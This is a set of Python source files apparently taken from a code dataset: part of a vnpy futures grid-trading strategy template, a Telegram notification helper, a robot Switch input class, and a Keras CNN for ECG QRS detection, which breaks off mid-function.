order_time=self.cur_datetime,
grid=order_grid)
if len(vt_orderids) > 0:
self.write_log(u'委托成功,orderid:{}'.format(vt_orderids))
order_grid.snapshot.update({'open_price': short_price})
else:
self.write_error(u'撤单后,重新委托开空仓失败')
else:
buy_price = self.cur_mi_price + self.price_tick
if order_grid.volume != order_volume and order_volume > 0:
self.write_log(
u'网格volume:{},order_volume:{}不一致,修正'.format(order_grid.volume, order_volume))
order_grid.volume = order_volume
self.write_log(u'重新提交{}开多委托,开多价{},v:{}'.format(order_vt_symbol, buy_price, order_volume))
vt_orderids = self.buy(price=buy_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=order_type,
order_time=self.cur_datetime,
grid=order_grid)
if len(vt_orderids) > 0:
self.write_log(u'委托成功,orderids:{}'.format(vt_orderids))
order_grid.snapshot.update({'open_price': buy_price})
else:
self.write_error(u'撤单后,重新委托开多仓失败')
else:
# 属于平多委托单
if order_info['direction'] == Direction.SHORT:
sell_price = self.cur_mi_price - self.price_tick
self.write_log(u'重新提交{}平多委托,{},v:{}'.format(order_vt_symbol, sell_price, order_volume))
vt_orderids = self.sell(price=sell_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=order_type,
order_time=self.cur_datetime,
grid=order_grid)
if len(vt_orderids) > 0:
self.write_log(u'委托成功,orderids:{}'.format(vt_orderids))
else:
self.write_error(u'撤单后,重新委托平多仓失败')
# 属于平空委托单
else:
cover_price = self.cur_mi_price + self.price_tick
self.write_log(u'重新提交{}平空委托,委托价{},v:{}'.format(order_vt_symbol, cover_price, order_volume))
vt_orderids = self.cover(price=cover_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=order_type,
order_time=self.cur_datetime,
grid=order_grid)
if len(vt_orderids) > 0:
self.write_log(u'委托成功,orderids:{}'.format(vt_orderids))
else:
self.write_error(u'撤单后,重新委托平空仓失败')
else:
self.write_log(u'撤单逻辑 => 无须重新开仓')
if order_info['offset'] == Offset.OPEN \
and order_grid \
and len(order_grid.order_ids) == 0:
if order_info['traded'] == 0 and order_grid.traded_volume == 0:
self.write_log(u'撤单逻辑 => 无任何成交 => 移除委托网格{}'.format(order_grid.__dict__))
order_info['grid'] = None
self.gt.remove_grids_by_ids(direction=order_grid.direction, ids=[order_grid.id])
elif order_info['traded'] > 0:
self.write_log('撤单逻辑 = > 部分开仓')
if order_grid.traded_volume < order_info['traded']:
self.write_log('撤单逻辑 = > 调整网格开仓数 {} => {}'.format(order_grid.traded_volume, order_info['traded'] ))
order_grid.traded_volume = order_info['traded']
self.write_log(f'撤单逻辑 => 调整网格委托状态=> False, 开仓状态:True, 开仓数量:{order_grid.volume}=>{order_grid.traded_volume}')
order_grid.order_status = False
order_grid.open_status = True
order_grid.volume = order_grid.traded_volume
order_grid.traded_volume = 0
# 删除撤单的订单
for vt_orderid in canceled_ids:
self.write_log(u'撤单逻辑 => 删除未完成订单:{}'.format(vt_orderid))
self.active_orders.pop(vt_orderid, None)
if len(self.active_orders) == 0:
self.entrust = 0
def tns_close_long_pos(self, grid):
"""
事务平多单仓位
1.来源自止损止盈平仓
逻辑: 如果当前账号昨仓满足平仓数量,直接平仓,如果不满足,则创建锁仓网格.
:param 平仓网格
:return:
"""
self.write_log(u'执行事务平多仓位:{}'.format(grid.to_json()))
# 平仓网格得合约
sell_symbol = grid.snapshot.get('mi_symbol', self.vt_symbol)
# 从cta engine获取当前账号中,sell_symbol的持仓情况
grid_pos = self.cta_engine.get_position_holding(vt_symbol=sell_symbol)
if grid_pos is None:
self.write_error(u'无法获取{}得持仓信息'.format(sell_symbol))
return False
# 不需要日内锁仓,或者昨仓可以满足,发出委托卖出单
if (grid_pos.long_yd >= grid.volume > 0 and grid_pos.long_td == 0 and grid_pos.short_td == 0) \
or not self.activate_today_lock:
if self.activate_today_lock:
self.write_log(u'昨仓多单:{},没有今仓,满足条件,直接平昨仓'.format(grid_pos.long_yd))
sell_price = self.cta_engine.get_price(sell_symbol)
if sell_price is None:
self.write_error(f'暂时不能获取{sell_symbol}价格,不能平仓')
return False
# 实盘使用对价
if not self.backtesting:
sell_tick = self.cta_engine.get_tick(sell_symbol)
if sell_tick and 0 < sell_tick.bid_price_1 < sell_price:
sell_price = sell_tick.bid_price_1
# 发出平多委托
if grid.traded_volume > 0:
grid.volume -= grid.traded_volume
grid.traded_volume = 0
# 非股指,才需要检查现有仓位
if self.exchange!= Exchange.CFFEX and grid_pos.long_pos <grid.volume:
self.write_error(f'账号{sell_symbol}多单持仓:{grid_pos.long_pos}不满足平仓:{grid.volume}要求:')
return False
vt_orderids = self.sell(price=sell_price,
volume=grid.volume,
vt_symbol=sell_symbol,
order_type=self.order_type,
order_time=self.cur_datetime,
lock=self.exchange==Exchange.CFFEX,
grid=grid)
if len(vt_orderids) == 0:
self.write_error(u'多单平仓委托失败')
return False
else:
self.write_log(u'多单平仓委托成功,编号:{}'.format(vt_orderids))
return True
# 当前没有昨仓,采用锁仓处理
else:
self.write_log(u'昨仓多单:{}不满足条件,创建对锁仓'.format(grid_pos.long_yd))
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = sell_symbol
dist_record['price'] = self.cur_mi_price
dist_record['volume'] = grid.volume
dist_record['operation'] = 'add short lock[long]'
self.save_dist(dist_record)
# 创建一个对锁网格
lock_grid = copy(grid)
# 网格类型, => 锁仓格
lock_grid.type = LOCK_GRID
lock_grid.id = str(uuid.uuid1())
lock_grid.direction = Direction.SHORT
lock_grid.open_status = False
lock_grid.order_status = False
lock_grid.order_ids = []
vt_orderids = self.short(self.cur_mi_price,
volume=lock_grid.volume,
vt_symbol=self.vt_symbol,
order_type=self.order_type,
order_time=self.cur_datetime,
grid=lock_grid)
if len(vt_orderids) > 0:
# 原做多网格得类型,设置为锁仓格
grid.type = LOCK_GRID
self.write_log(u'委托创建对锁单(空单)成功,委托编号:{},{},p:{},v:{}'
.format(vt_orderids,
sell_symbol,
self.cur_mi_price,
lock_grid.volume))
lock_grid.snapshot.update({'mi_symbol': self.vt_symbol, 'open_price': self.cur_mi_price})
self.gt.up_grids.append(lock_grid)
return True
else:
self.write_error(u'未能委托对锁单(空单)')
return False
def tns_close_short_pos(self, grid):
"""
事务平空单仓位
1.来源自止损止盈平仓
2.来源自换仓
逻辑: 如果当前账号昨仓满足平仓数量,直接平仓,如果不满足,则创建锁仓网格.
:param 平仓网格
:return:
"""
self.write_log(u'执行事务平空仓位:{}'.format(grid.to_json()))
# 平仓网格得合约
cover_symbol = grid.snapshot.get('mi_symbol', self.vt_symbol)
# vt_symbol => holding position
grid_pos = self.cta_engine.get_position_holding(cover_symbol)
if grid_pos is None:
self.write_error(u'无法获取{}得持仓信息'.format(cover_symbol))
return False
# 昨仓可以满足,发出委托卖出单
if (grid_pos.short_yd >= grid.volume > 0 and grid_pos.long_td == 0 and grid_pos.short_td == 0) \
or not self.activate_today_lock:
if self.activate_today_lock:
self.write_log(u'昨仓空单:{},没有今仓, 满足条件,直接平昨仓'.format(grid_pos.short_yd))
cover_price = self.cta_engine.get_price(cover_symbol)
if cover_price is None:
self.write_error(f'暂时没有{cover_symbol}行情,不能执行平仓')
return False
# 实盘使用对价
if not self.backtesting:
cover_tick = self.cta_engine.get_tick(cover_symbol)
if cover_tick and 0 < cover_price < cover_tick.ask_price_1 :
cover_price = cover_tick.ask_price_1
# 发出cover委托
if grid.traded_volume > 0:
grid.volume -= grid.traded_volume
grid.traded_volume = 0
# 非股指,需要检查是否有持仓
if self.exchange!=Exchange.CFFEX and grid_pos.short_pos < grid.volume:
self.write_error(f'账号{cover_symbol}空单持仓:{grid_pos.short_pos}不满足平仓:{grid.volume}要求:')
return False
vt_orderids = self.cover(price=cover_price,
volume=grid.volume,
vt_symbol=cover_symbol,
order_type=self.order_type,
order_time=self.cur_datetime,
lock=self.exchange==Exchange.CFFEX,
grid=grid)
if len(vt_orderids) == 0:
self.write_error(u'空单平仓委托失败')
return False
else:
self.write_log(u'空单平仓委托成功,编号:{}'.format(vt_orderids))
return True
# 当前没有昨仓,采用锁仓处理
else:
self.write_log(u'昨仓空单:{}不满足条件,建立对锁仓'.format(grid_pos.short_yd))
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = cover_symbol
dist_record['price'] = self.cur_mi_price
dist_record['volume'] = grid.volume
dist_record['operation'] = 'add long lock[short]'
self.save_dist(dist_record)
# 创建一个对锁网格
lock_grid = copy(grid)
# 网格类型, => 锁仓格
lock_grid.type = LOCK_GRID
lock_grid.id = str(uuid.uuid1())
lock_grid.direction = Direction.LONG
lock_grid.open_status = False
lock_grid.order_status = False
lock_grid.order_ids = []
vt_orderids = self.buy(price=self.cur_mi_price,
volume=lock_grid.volume,
vt_symbol=cover_symbol,
order_type=self.order_type,
grid=lock_grid)
if len(vt_orderids) > 0:
# 原做空网格得类型,设置为锁仓格
grid.type = LOCK_GRID
self.write_log(u'委托创建对锁单(多单)成功,委托编号:{},{},p:{},v:{}'
.format(vt_orderids,
self.vt_symbol,
self.cur_mi_price,
lock_grid.volume))
lock_grid.snapshot.update({'mi_symbol': self.vt_symbol, 'open_price': self.cur_mi_price})
self.gt.dn_grids.append(lock_grid)
return True
else:
self.write_error(u'未能委托对锁单(多单)')
return False
def tns_open_from_lock(self, open_symbol, open_volume, grid_type, open_direction):
"""
从锁仓单中,获取已开的网格(对手仓设置为止损)
1, 检查多空锁仓单中,是否有满足数量得昨仓,
2, 定位到需求网格,
:param open_symbol: 开仓合约(主力合约)
:param open_volume:
:param grid_type 更新网格的类型
:param open_direction: 开仓方向
:return: None, 保留的格
"""
# 检查多单得对锁格
locked_long_grids = self.gt.get_opened_grids_within_types(direction=Direction.LONG, types=[LOCK_GRID])
if len(locked_long_grids) == 0:
return None
locked_long_dict = {}
for g in locked_long_grids:
symbol = g.snapshot.get('mi_symbol', self.vt_symbol)
if g.order_status or g.order_ids:
self.write_log(u'当前对锁格:{}存在委托,不纳入计算'.format(g.to_json()))
continue
if symbol != open_symbol:
self.write_log(u'不处理symbol不一致: 委托请求:{}, Grid mi Symbol:{}'.format(open_symbol, symbol))
continue
volume = g.volume - g.traded_volume
locked_long_dict.update({symbol: locked_long_dict.get(symbol, 0) + volume})
locked_long_volume = locked_long_dict.get(open_symbol, 0)
if locked_long_volume < open_volume:
self.write_log(u'锁单中,没有足够得多单:{},需求:{}'.format(locked_long_volume, open_volume))
return None
# 空单对锁格
locked_short_grids = self.gt.get_opened_grids_within_types(direction=Direction.SHORT, types=[LOCK_GRID])
if len(locked_short_grids) == 0:
return None
locked_short_dict = {}
for g in locked_short_grids:
symbol = g.snapshot.get('mi_symbol', self.vt_symbol)
if g.order_status or g.order_ids:
self.write_log(u'当前对锁格:{}存在委托,不进行解锁'.format(g.to_json()))
continue
if symbol != open_symbol:
self.write_log(u'不处理symbol不一致: 委托请求:{}, Grid mi Symbol:{}'.format(open_symbol, symbol))
continue
volume = g.volume - g.traded_volume
locked_short_dict.update({symbol: locked_short_dict.get(symbol, 0) + volume})
locked_short_volume = locked_short_dict.get(open_symbol, 0)
if locked_short_volume < open_volume:
self.write_log(u'锁单中,没有足够得空单:{},需求:{}'.format(locked_short_volume, open_volume))
return None
# 检查空单昨仓是否满足
symbol_pos = self.cta_engine.get_position_holding(open_symbol)
if (open_direction == Direction.LONG and symbol_pos.short_yd < open_volume) \
or (open_direction == Direction.SHORT and symbol_pos.long_yd < open_volume):
self.write_log(u'昨仓数量,多单:{},空单:{},不满足:{}'
.format(symbol_pos.long_yd, symbol_pos.short_yd, open_volume))
return None
# 合并/抽离出 满足open_volume得多格,
target_long_grid = None
remove_long_grid_ids = []
for g in sorted(locked_long_grids, key=lambda grid: grid.volume):
if g.order_status or len(g.order_ids) > 0:
continue
if target_long_grid is None:
target_long_grid = g
if g.volume == open_volume:
self.write_log(u'第一个网格持仓数量一致:g.volume:{},open_volume:{}'
.format(g.volume, open_volume))
break
elif g.volume > open_volume:
self.write_log(u'第一个网格持仓数量大于需求:g.volume:{},open_volume:{}'
.format(g.volume, open_volume))
remain_grid = copy(g)
g.volume = open_volume
remain_grid.volume -= open_volume
remain_grid.id = str(uuid.uuid1())
self.gt.dn_grids.append(remain_grid)
self.write_log(u'添加剩余仓位到新多单网格:g.volume:{}'
.format(remain_grid.volume))
break
else:
if g.volume <= open_volume - target_long_grid.volume:
self.write_log(u'网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_long_grid.volume))
target_long_grid.volume += g.volume
g.volume = 0
self.write_log(u'计划移除:{}'.format(g.id))
remove_long_grid_ids.append(g.id)
else:
self.write_log(u'转移前网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_long_grid.volume))
g.volume -= (open_volume - target_long_grid.volume)
target_long_grid.volume = open_volume
self.write_log(u'转移后网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_long_grid.volume))
break
target_short_grid = None
remove_short_grid_ids = []
for g in sorted(locked_short_grids, key=lambda grid: grid.volume):
if g.order_status or g.order_ids:
continue
if target_short_grid is None:
target_short_grid = g
if g.volume == open_volume:
self.write_log(u'第一个空单网格持仓数量满足需求:g.volume:{},open_volume:{}'
.format(g.volume, open_volume))
break
elif g.volume > open_volume:
self.write_log(u'第一个空单网格持仓数量大于需求:g.volume:{},open_volume:{}'
.format(g.volume, open_volume))
remain_grid = copy(g)
g.volume = open_volume
remain_grid.volume -= open_volume
remain_grid.id = str(uuid.uuid1())
self.gt.up_grids.append(remain_grid)
self.write_log(u'添加剩余仓位到新空单网格:g.volume:{}'
.format(remain_grid.volume))
break
else:
if g.volume <= open_volume - target_short_grid.volume:
target_short_grid.volume += g.volume
g.volume = 0
remove_short_grid_ids.append(g.id)
else:
self.write_log(u'转移前空单网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_short_grid.volume))
g.volume -= (open_volume - target_short_grid.volume)
target_short_grid.volume = open_volume
self.write_log(u'转移后空单网格持仓数量:g.volume:{},open_volume:{},保留格:{}'
.format(g.volume,
open_volume,
target_short_grid.volume))
break
if target_long_grid.volume is None or target_short_grid is None:
self.write_log(u'未能定位多单网格和空单网格,不能解锁')
return None
# 移除volume为0的网格
self.gt.remove_grids_by_ids(direction=Direction.LONG, ids=remove_long_grid_ids)
self.gt.remove_grids_by_ids(direction=Direction.SHORT, ids=remove_short_grid_ids)
if open_direction == Direction.LONG:
self.write_log(u'保留多单,对空单:{}平仓'.format(target_short_grid.id))
# 对空单目标网格进行平仓
cover_price = self.cta_engine.get_price(open_symbol)
# 使用止损价作为平仓
self.write_log(u'空单止损价 :{} =>{}'.format(target_short_grid.stop_price, cover_price - 10 * self.price_tick))
target_short_grid.stop_price = cover_price - 10 * self.price_tick
# 更新对锁格类型=>指定类型
self.write_log(u'空单类型 :{} =>{}'.format(target_short_grid.type, grid_type))
target_short_grid.type = grid_type
# 返回保留的多单网格
return target_long_grid
else:
self.write_log(u'保留空单,对多单平仓')
sell_price = self.cta_engine.get_price(open_symbol)
# # 使用止损价作为平仓
self.write_log(u'多单止损价 :{} =>{}'.format(target_short_grid.stop_price, sell_price + 10 * self.price_tick))
target_long_grid.stop_price = sell_price + 10 * self.price_tick
# 更新对锁格类型=>指定类型
self.write_log(u'多单类型 :{} =>{}'.format(target_short_grid.type, grid_type))
target_long_grid.type = grid_type
# 返回保留的空单网格
return target_short_grid
def tns_close_locked_grids(self, grid_type):
"""
事务对所有对锁网格进行平仓
:return:
"""
# 正在委托时,不处理
if self.entrust != 0:
return
if not self.activate_today_lock:
return
# 多单得对锁格
locked_long_grids = self.gt.get_opened_grids_within_types(direction=Direction.LONG, types=[LOCK_GRID])
if len(locked_long_grids) == 0:
return
locked_long_dict = {}
for g in locked_long_grids:
vt_symbol = g.snapshot.get('mi_symbol', self.vt_symbol)
volume = g.volume - g.traded_volume
locked_long_dict.update({vt_symbol: locked_long_dict.get(vt_symbol, 0) + volume})
if g.order_status or g.order_ids:
self.write_log(u'当前对锁格:{}存在委托,不进行解锁'.format(g.to_json()))
return
locked_long_volume = sum(locked_long_dict.values(), 0)
# 空单对锁格
locked_short_grids = self.gt.get_opened_grids_within_types(direction=Direction.SHORT, types=[LOCK_GRID])
if len(locked_short_grids) == 0:
return
locked_short_dict = {}
for g in locked_short_grids:
vt_symbol = g.snapshot.get('mi_symbol', self.vt_symbol)
volume = g.volume - g.traded_volume
locked_short_dict.update({vt_symbol: locked_short_dict.get(vt_symbol, 0) + volume})
if g.order_status or g.order_ids:
self.write_log(u'当前对锁格:{}存在委托,不进行解锁'.format(g.to_json()))
return
locked_short_volume = sum(locked_short_dict.values(), 0)
# debug info
self.write_log(u'多单对锁格:{}'.format([g.to_json() for g in locked_long_grids]))
self.write_log(u'空单对锁格:{}'.format([g.to_json() for g in locked_short_grids]))
if locked_long_volume != locked_short_volume:
self.write_error(u'{}对锁格多空数量不一致,不能解锁.\n多:{},\n空:{}'
.format(self.strategy_name, locked_long_volume, locked_short_volume))
return
# 检查所有品种得昨仓是否满足数量
for vt_symbol, volume in locked_long_dict.items():
pos = self.cta_engine.get_position_holding(vt_symbol, None)
if pos is None:
self.write_error(u'{} 没有获取{}得持仓信息,不能解锁')
return
# 检查多空单得昨单能否满足
if pos.long_yd < volume or pos.short_yd < volume:
self.write_error(u'{}持仓昨仓多单:{},空单:{},不满足解锁数量:{}'
.format(vt_symbol, pos.long_yd, pos.short_td, volume))
return
if pos.long_td > 0 or pos.short_td > 0:
self.write_log(u'{}存在今多仓:{},空仓{},不满足解锁条件'.format(vt_symbol, pos.long_td, pos.short_td))
return
price = self.cta_engine.get_price(vt_symbol)
if price is None:
self.write_error(u'{}价格不在tick_dict缓存中,不能解锁'.format(vt_symbol))
# 所有合约价格和仓位都满足同时解开
for g in locked_long_grids:
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = self.vt_symbol
dist_record['price'] = self.cur_mi_price
dist_record['volume'] = g.volume
dist_record['operation'] = 'close lock[long]'
self.save_dist(dist_record)
# 通过切换回普通网格,提升止损价的方式实现平仓
self.write_log(
u'网格 从锁仓 {}=>{},提升止损价{}=>{}进行离场'.format(LOCK_GRID, grid_type, g.stop_price,
self.cur_99_price / 2))
g.type = grid_type
g.stop_price = self.cur_99_price / 2
for g in locked_short_grids:
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = self.vt_symbol
dist_record['price'] = self.cur_mi_price
dist_record['volume'] = g.volume
dist_record['operation'] = 'close lock[short]'
self.save_dist(dist_record)
# 通过切换回普通网格,提升止损价的方式实现平仓
self.write_log(u'网格 从锁仓 {}=>{},提升止损价{}=>{}进行离场'.format(LOCK_GRID, grid_type, g.stop_price,
self.cur_99_price * 2))
g.type = grid_type
g.stop_price = self.cur_99_price * 2
def grid_check_stop(self):
"""
网格逐一止损/止盈检查 (根据指数价格进行止损止盈)
:return:
"""
if self.entrust != 0:
return
if not self.trading:
if not self.backtesting:
self.write_error(u'当前不允许交易')
return
# 多单网格逐一止损/止盈检查:
long_grids = self.gt.get_opened_grids_without_types(direction=Direction.LONG, types=[LOCK_GRID])
for g in long_grids:
# 满足离场条件,或者碰到止损价格
if g.stop_price > 0 and g.stop_price > self.cur_99_price \
and g.open_status and not g.order_status:
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = self.idx_symbol
dist_record['volume'] = g.volume
dist_record['price'] = self.cur_99_price
dist_record['operation'] = 'stop leave'
dist_record['signals'] = '{}<{}'.format(self.cur_99_price, g.stop_price)
# 止损离场
self.write_log(u'{} 指数价:{} 触发多单止损线{},{}当前价:{}。指数开仓价:{},主力开仓价:{},v:{}'.
format(self.cur_datetime, self.cur_99_price, g.stop_price, self.vt_symbol,
self.cur_mi_price,
g.open_price, g.snapshot.get('open_price'), g.volume))
self.save_dist(dist_record)
if self.tns_close_long_pos(g):
self.write_log(u'多单止盈/止损委托成功')
else:
self.write_error(u'多单止损委托失败')
# 空单网格止损检查
short_grids = self.gt.get_opened_grids_without_types(direction=Direction.SHORT, types=[LOCK_GRID])
for g in short_grids:
if g.stop_price > 0 and g.stop_price < self.cur_99_price \
and g.open_status and not g.order_status:
dist_record = dict()
dist_record['datetime'] = self.cur_datetime
dist_record['symbol'] = self.idx_symbol
dist_record['volume'] = g.volume
dist_record['price'] = self.cur_99_price
dist_record['operation'] = 'stop leave'
dist_record['signals'] = '{}<{}'.format(self.cur_99_price, g.stop_price)
# 网格止损
self.write_log(u'{} 指数价:{} 触发空单止损线:{},{}最新价:{}。指数开仓价:{},主力开仓价:{},v:{}'.
format(self.cur_datetime, self.cur_99_price, g.stop_price, self.vt_symbol,
self.cur_mi_price,
g.open_price, g.snapshot.get('open_price'), g.volume))
self.save_dist(dist_record)
if self.tns_close_short_pos(g):
self.write_log(u'空单止盈/止损委托成功')
else:
self.write_error(u'委托空单平仓失败')
| 39.78922 | 136 | 0.53135 | [
"MIT"
] | UtorYeung/vnpy | vnpy/app/cta_strategy_pro/template.py | 107,524 | Python |
#!/usr/bin/python
import pathlib
import requests
import smtplib
import logging
import coloredlogs
import verboselogs
from etc.api.keys import *
path_atual_tl = str(pathlib.Path(__file__).parent.absolute())
path_tl_final = path_atual_tl.replace('/etc/notification','')
def logando_notification(tipo, mensagem):
"""
Generates the log message/Gera a mensagem de log.
:param tipo: Sets the log type/Seta o tipo de log.
:param mensagem: Sets the message of log/Seta a mensagem do log.
:return: Returns the complete log's body/Retorna o corpo completo do log.
"""
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG')
coloredlogs.install(level='DEBUG', logger=logger)
logging.basicConfig(format='%(asctime)s %(hostname)s %(name)s[%(process)d] %(levelname)s %(message)s')
logger = verboselogs.VerboseLogger('')
if tipo == 'verbose':
logger.verbose(mensagem)
elif tipo == 'debug':
logger.debug(mensagem)
elif tipo == 'info':
logger.info(mensagem)
elif tipo == 'warning':
logger.warning(mensagem)
elif tipo == 'error':
logger.error(mensagem)
elif tipo == 'critical':
logger.critical(mensagem)
else:
pass
def notificar_telegram(status_nosafe=False, data_nosafe=None):
"""
Generates the notification to Telegram account/Gera a notificação para a conta do Telegram.
"""
usuarios = []
with open(f'{path_tl_final}/etc/notification/users.txt', 'r') as lista:
separar = lista.readlines()
if status_nosafe:
mensagem = str(data_nosafe)
else:
with open(f'{path_tl_final}/etc/notification/message.txt', 'r') as mensagem_corpo:
mensagem = str(mensagem_corpo.read())
for i in separar:
i = i.strip('\r')
i = i.strip('\n')
i = i.split(';')
usuarios += i
for i in usuarios:
if i == '' or i == ' ':
usuarios.remove(i)
for mandar in usuarios:
token = telegram_bot
chat_id = mandar
texto = mensagem
#url_req = f'https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text={texto}'
send_message(chat_id=mandar, text=mensagem, token=telegram_bot)
#results = requests.get(url_req)
def send_message(chat_id, text=None, parse_mode = 'Markdown', token=None):
"""
Sends message in bold mode/Enviar mensagem em negrito.
:param chat_id: ID of Telegram account/ID da conta Telgram.
:param text: Message/Mensagem.
:param parse_mode: Ignore.
:param token: ID Telegram bot/ID do bot Telegram.
"""
URL = f'https://api.telegram.org/bot{token}/sendMessage?chat_id={chat_id}&text={text}'
answer = {'chat_id': chat_id, 'text': text, 'parse_mode': 'Markdown'}
r = requests.post(URL, json=answer)
if (text == '/bold'):
send_message(chat_id, 'Here comes the'+'*'+'bold'+'*'+'text!')
| 28.326923 | 106 | 0.644942 | [
"BSD-3-Clause"
] | 4jinetes/Oblivion | Linux/etc/notification/telegram.py | 2,948 | Python |
import logging
from abc import abstractmethod
from .input import Input
from .input_config import assert_keycode_list
class Switch(Input):
"""Switch input class
Implement custom on() and off() logic
Read more about defaults from input_config.py
"""
def validate_defaults(self, defaults):
super().validate_defaults(defaults)
assert defaults.keys() <= {
"humanReadableName",
"onScreenPosition",
"keys",
}, "there were extra items in defaults"
assert "keys" in defaults
assert_keycode_list(defaults["keys"])
async def _on_input(self, command, seat):
"""Switch input functionality
Calls on and off depending on command state
:param command: Command from game engine
:type command: dict
:param seat: Robot seat
:type seat: int
"""
if "state" not in command:
logging.warning("Switch: invalid command received")
return
try:
val = str(command["state"])
except (ValueError, TypeError):
logging.warn(
f"Switch: could not convert {command['state']} into String"
)
return
if val != "up" and val != "down":
logging.warn("Switch: command not <up|down>")
return
if val == "up":
await self.off(seat)
else:
await self.on(seat)
@abstractmethod
async def on(self, seat):
"""Switch turned on functionality
:param seat: Robot seat
:type seat: int
"""
pass
@abstractmethod
async def off(self, seat):
"""Switch turned off functionality
:param seat: Robot seat
:type seat: int
"""
pass
async def reset(self, seat):
"""Switch reset functionality
Defaults to calling off()
:param seat: Robot seat
:type seat: int
"""
await self.off(seat)
def get_name(self):
"""Returns the name of the input
:return: name of the input
:rtype: str
"""
return "button"
def _get_default_keybinds(self):
binds = self.get_default_keybinds()
if not isinstance(binds, list):
binds = [binds]
def enum_to_str(item):
if type(item) is not str:
return item.value
return item
binds = list(map(enum_to_str, binds))
return {"keys": binds}
def get_default_keybinds(self):
"""Returns a single keybind or a list of keybinds.
Switches are bound to the space key by default.
To override the defaults, override this method in your switch
subclass and return different keybinds.
"""
return []
| 24.643478 | 75 | 0.565279 | [
"MIT"
] | SurrogateInc/surrortg-sdk | surrortg/inputs/switch.py | 2,834 | Python |
#!/usr/bin/python
# -*- encoding: utf-8 -*-
"""
@ide: PyCharm
@author: Pedro Silva
@contact: [email protected]
@created: out-10 of 2019
"""
import os
import numpy as np
import tensorflow as tf
import tensorflow.keras.backend as kback
from tensorflow import keras
class QRSNet(object):
@classmethod
def _cnn_net(cls):
"""
Create the CNN net topology.
:return keras.Sequential(): CNN topology.
"""
qrs_detector = keras.Sequential()
# CONV1
qrs_detector.add(keras.layers.Conv1D(96, 49, activation=tf.nn.relu, input_shape=(300, 1), strides=1, name='conv1'))
# POOLING 1
qrs_detector.add(keras.layers.MaxPool1D(pool_size=2, strides=2, name='pool1'))
# CONV2
qrs_detector.add(keras.layers.Conv1D(128, 25, activation=tf.nn.relu, strides=1, name='conv2'))
# POOLING 2
qrs_detector.add(keras.layers.MaxPool1D(pool_size=2, strides=2, name='pool2'))
# CONV3
qrs_detector.add(keras.layers.Conv1D(256, 9, activation=tf.nn.relu, strides=1, name='conv3'))
# POOLING 3
qrs_detector.add(keras.layers.MaxPool1D(pool_size=2, strides=2, name='pool3'))
# CONV4
qrs_detector.add(keras.layers.Conv1D(512, 9, activation=tf.nn.relu, strides=1, name='conv4'))
# POOLING 4
qrs_detector.add(keras.layers.MaxPool1D(pool_size=2, strides=2, name='pool4'))
qrs_detector.add(keras.layers.Flatten(data_format=None, name='flatten'))
# FC1
qrs_detector.add(keras.layers.Dense(units=4096, activation=tf.nn.relu, name='fc1'))
# FC2
qrs_detector.add(keras.layers.Dense(units=4096, activation=tf.nn.relu, name='fc2'))
# DROP1
qrs_detector.add(keras.layers.Dropout(rate=0.5, name='drop1'))
# Classes
qrs_detector.add(keras.layers.Dense(units=2, name='classes'))
# SoftMax
qrs_detector.add(keras.layers.Activation(activation=tf.nn.softmax, name='softmax'))
return qrs_detector
@classmethod
def build(cls, net_type):
"""
Build the CNN topology.
:param str net_type: the network type, CNN or LSTM.
:return keras.Sequential(): CNN topology.
"""
if net_type == 'cnn':
qrs_detector = cls._cnn_net()
else:
raise NotImplementedError('Only the CNN network was implemented.')
return qrs_detector
@classmethod
def _prepare_data(cls, data_x, input_shape, data_y, number_of_classes, normalize):
"""
Prepare the data for the training, turning it into a numpy array.
:param list data_x: data that will be used to train.
:param tuple input_shape: the input shape that the data must have to be used as training data.
:param list data_y: the labels related to the data used to train.
:param int number_of_classes: number of classes of the problem.
:param bool normalize: if the data should be normalized (True) or not (False).
:return np.array: the data processed.
"""
if len(input_shape) == 2:
data_x = np.asarray(data_x).reshape(-1, input_shape[0], input_shape[1]) # Reshape for CNN - should work!!
elif len(input_shape) == 3:
data_x = np.asarray(data_x).reshape(-1, input_shape[0], input_shape[1], input_shape[2]) # Reshape for CNN - should work!!
else:
raise Exception('Only inputs of two and three dimensions were implemented.')
if normalize:
data_x = data_x / np.amax(data_x)
data_y = keras.utils.to_categorical(data_y).reshape(-1, number_of_classes)
return data_x, data_y
@classmethod
def train(cls, model, train_x, train_y, validation_x, validation_y, number_of_classes, input_shape=(300, 1),
epochs=10, lr=1e-4, batch_size=4, optimizer=None, loss=None, metrics=None, normalize=False, show_net_info=True):
"""
Function used to train the model.
:param keras.Sequential model: model to be trained.
:param list train_x: data that will be used to train.
:param list train_y: the labels related to the data used to train.
:param list validation_x: data that will be used to validate the model trained.
:param list validation_y: the labels related to the data used to validate the model trained.
:param int number_of_classes: number of classes of the problem.
:param tuple input_shape: the input shape that the data must have to be used as training data.
:param int epochs: total epochs that the model will be trained.
:param float lr: learning rate used to train.
:param int batch_size: batch size used to train.
:param optimizer: which optimizer will be used to train.
:param str loss: loss function used during the training.
:param list metrics: metrics used to evaluate the trained model.
:param bool normalize: if the data should be normalized (True) or not (False).
:param bool show_net_info: if the network topology should be showed (True) or not (False).
:return keras.Sequential, dict: model trained and the history of the training process.
"""
if optimizer is None:
optimizer = keras.optimizers.SGD(lr=lr, momentum=0.9, decay=1e-4/epochs)
if loss is None:
loss = keras.losses.categorical_crossentropy
if metrics is None:
metrics = ['acc']
elif type(metrics) is not list:
metrics = [metrics]
# Set optimizer
model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
if show_net_info:
print(model.summary())
# Prepare data
train_x, train_y = cls._prepare_data(train_x, input_shape, train_y, number_of_classes, normalize)
validation_x, validation_y = cls._prepare_data(validation_x, input_shape, validation_y, number_of_classes, normalize)
